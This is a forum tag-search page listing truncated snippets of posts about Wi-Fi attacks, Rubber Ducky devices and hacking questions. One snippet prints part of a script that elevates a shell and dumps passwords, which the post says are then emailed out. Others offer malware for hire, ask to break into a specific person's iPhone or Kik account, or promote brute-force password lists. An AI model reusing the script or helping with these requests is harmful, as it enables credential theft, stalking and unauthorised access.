Jump to content

Search the Community

Showing results for tags 'hack'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

  1. Has anyone managed to connect a bus pirate (or similar device) to the I2C terminals of the Intervillage Badge yet? Some have managed to send commands to the EEPROMs to enable or disable advanced features. Sounds like fun, but getting to the serial terminals is another challenge, due to the leather adhesive back.
  2. Hi all. Apologies if you saw this in the other thread category. I got no luck there and wanted to try here. I've searched the web for a similar problems but haven't had any luck with this in particular. I'm testing a dual band router on my network that operates 2.4 GHz and 5ghz at the same time . Most mobile phones connect to the 5ghz band . WhenI run a deauth (have tried MDK3 and Aireplay, and I have primed my dual band adapter using "band abg") it only disconnects the devices that are using the 2.4 GHz. First off all I am unsure as to why it is doing
  3. I was testing evil twin attack on my laptop using one wireless adapter. I ran it on airmegaddon and while I have successfully created a rogue AP, my laptop can't connect to the AP. It failed numerously. Is there a way to get connected to the AP that I have created?
  4. i am a new hacker please tell me good free websites to get me started
  5. Hi guys, I am new to this forum and after looking around nearly everywhere, I am unable to find an answer to this question and hoped you could help. After scanning a website with nkito, the result showed that it was vulnerable to the sips vulnerability and that I could login as admin without knowing the password. However, after inputting the information in the url, I was simply redirected to the login page which also contains a captcha. Is there anyway I can still exploit the vulnerability such as using Metasploit?? Please help
  6. can anyone plz tell me how i can make my own usb rubber duck using an ordinary flash drive? thx!
  7. Hi guys, very new to this, i have a very specific file I am looking for. I used to work for a company where one of my projects was developing a new design spreadsheet for design calculations of our core product range. I ran a team of engineers amd we came up with a template which was totally awesome. Then IT got involved and locked it down so only two people had access and I wasn’t one of them (was considered a need-to-know basis). Then I left the company, and a few years later decided to start my own. I’m looking for a way to obtain a copy of that spreadsheet and the username/passwo
  8. When I open a file for a game... There is some hidden one's that I can't see with the folder open. But through cmd there are things I can see in cmd but can't see in folders.
  9. Hi! If anyone needs good password list for bruteforce hacking - bigpasswordlist.com I've downloaded all biggest lists and merged them together. List is good.
  10. Hi guys, I have questions. I have pin and ssid of a hiden network but i don't know the way to find key? Thank's
  11. An extremely asked theme is how to hack an wifi network easily, today i has the answer to you question totally free. Today is possible to attach a kali linux to your windows totally free and by a quickly mode, using Virtual Box the work is dis complicated. In the link bellow i taught how to hack any wifi with any operational system. You can ask for help in the post comments... Click here to go to article
  12. So recently i have purchased a BadUsb ATMEGA32U4 USB as one in this image https://www.ebay.com/p/MicroSD-Virtual-Keyboard-Badusb-USB-TF-Memory-Keboard-Atmega32u4-Module/13011086107 and when i plugged it in it seemed to work fine until i uploaded a script to it and after that itll only turn on when i press the button on the usb i want to reset the usb so i can use it again
  13. can someone hack a kik account that is 2214 days old and retrieve all of the data on it that was ever sent or received?
  14. There are several kinds of attacks for Wifi Hacking. However, this tutorial about how to hack wifi i was checking. However, later when i tried it with Virtual machine on my windows 10, it didn't actually work. Is it happening because of Virtual Machine! should i install Kali Linux OS to make it fully work!
  15. I have been working around the Evil Twin Airbase-ng for quite a while and i am unable to get my victim PC which is my other windows 10 machine to connect; It did connect to the AP once(rarely) and when it did it had no internet connect which has kept me up for sometime, i am going to post the proccess i have performed please go through them and guide me through the issue. Note:i have tried iptables and echo 1 it didnt help Setting up USB Adapter TP-LINK TL-WN722N Version 1 to monitor mode airmon-ng start wlan0 Checking for background proccesses
  16. Hello people, I was recently doing some work with those VEX Robotics wireless control robots and I had some ideas about packet sniffing attacks, replay attacks, man in the middle attacks, and de-authentication attacks. The robots use the Vex cortex, which has a wireless adapter through a USB port, it says that is is 2.4 GHz, and another USB wireless adapter is plunged into a controller, like a joystick. My school did a competition with these robots, and it ended last week, now we are doing another thing just as a school, they said we were doing battle bots. When I did some research I
  17. bro i made a payload in metasploit by using ngrok without portforwarding so that i can go WAN...but in ngrok the port get changed everytime i open it...so ineed to make the payload again and again and send it to the victim...is there any way i can overcome this
  18. Iam so curious to someone. I want know her more. Can i hack her iphone with wifi connection? or something else can i do? please help me
  19. I am not sure if this is the right bored to be talking about this I am willing to code Trojans,Viruses,Bots and any other type of malware in exchange for bitcoins. It could do just about anything you want example: Backdoor a system, Destroy the entire computer, Delete files, Record video and audio, etc pm me if your interested
  20. Hi everybody, I'm chatting on an IRC Website (That not allows simple users to connect by an IRC Client, but only Browsers ...). When spamming or flooding, I've been being banned with 3 Types of bans : 1. Banning the IP address (I simply Bypass this ban by rebooting my Wi-Fi Router because I have a dynamic IP address); 2. Banning the MAC address (I'm again capable of bypassing this by changing my MAC address with the freeware '' TMAC Changer '' ); 3. Banning the Browser connection (Here comes my problem, in other terms, even if I do a clean uninstall / install of my browse
  21. This is a modified version of MrGray's script to get passwords from a pc (Original). This version doesn't require an extra usb, but it does require a online server hosting a zip with the tools. CODE ------------------------------------------------------- REM Created by BertFast REM Gets passwords and data from pc and emails them DELAY 500 GUI d DELAY 200 GUI r DELAY 300 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 3000 LEFT ENTER DELAY 500 STRING powershell & cd %TEMP%\tools & BrowsingHistoryView.exe /stext logs\BrowsingHistoryView.txt & C
  22. Hi, Anyone know a attack for WPA TKIP attack like, the famous wep recover key (I have a bad English so I will write the same in spanish), I mean, not a social engineering attack or brute force hash attack. Exploiting this vulnerability " http://mobile.wi-fiplanet.com/news/article.php/3784251/WPA-Vulnerability-Discovered.htm ". Hola, primero discúlpenme el inglés, no es mi idioma materno. quería saber si alguien sabe como explotar la vulnerabilidad de las claves WPA descritas en el hipervinculo, un ataque similar al wep para recuperar las claves. Gracias de antemano.
  23. when i plug my USB rubber ducky into the USB slot and push the black button the ducky opens a command prompt and types: or /f % in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d %myd%/duck The USB even types that if i don't have any SD card in the slot. i am running firmware c_duck_us.hex because that is the only one that actually acts like a keyboard if anyone has the factory hex i would appreciate if you send it to me thanks
  24. Interesting research worth a read and watch. I think the devices used are around the $185 mark. type RX band- TX band- Function Application width width UT-100A 6-8 MHz 2-8 MHz Rx-Tx General UT-100B 2-4 MHz 2-8 MHz Rx-Tx amateur UT-100C - 2-8 MHz Tx General UT-100D 2-4 MHz - Rx amateur http://www.idealez.com/hides/home/en_US/ http://www.ebay.com/sch/hides168/m.html?item=322470042239&hash=item4b14b65a7f%3Ag%3AGc4AAMXQVT9TBXWO&rt=nc&_trksid=p2047675.l2562
  25. BioBoss

    Old Online Game

    I found this game called graal online classic it's an online rpg, apparently its really old. It reminds me of old gb zelda. I've been messing around with it for a while doing simple hacks. But I'm curious has anyone else ever heard of it, its confusing at first but kinda fun. I'm looking into creating a hacked client or something but still looking for exploits. There seems to be a small loyal community around the game. anyway here's the link: http://classic.graalonline.com/ here's the form: http://www.graalians.com/forums/
×
×
  • Create New...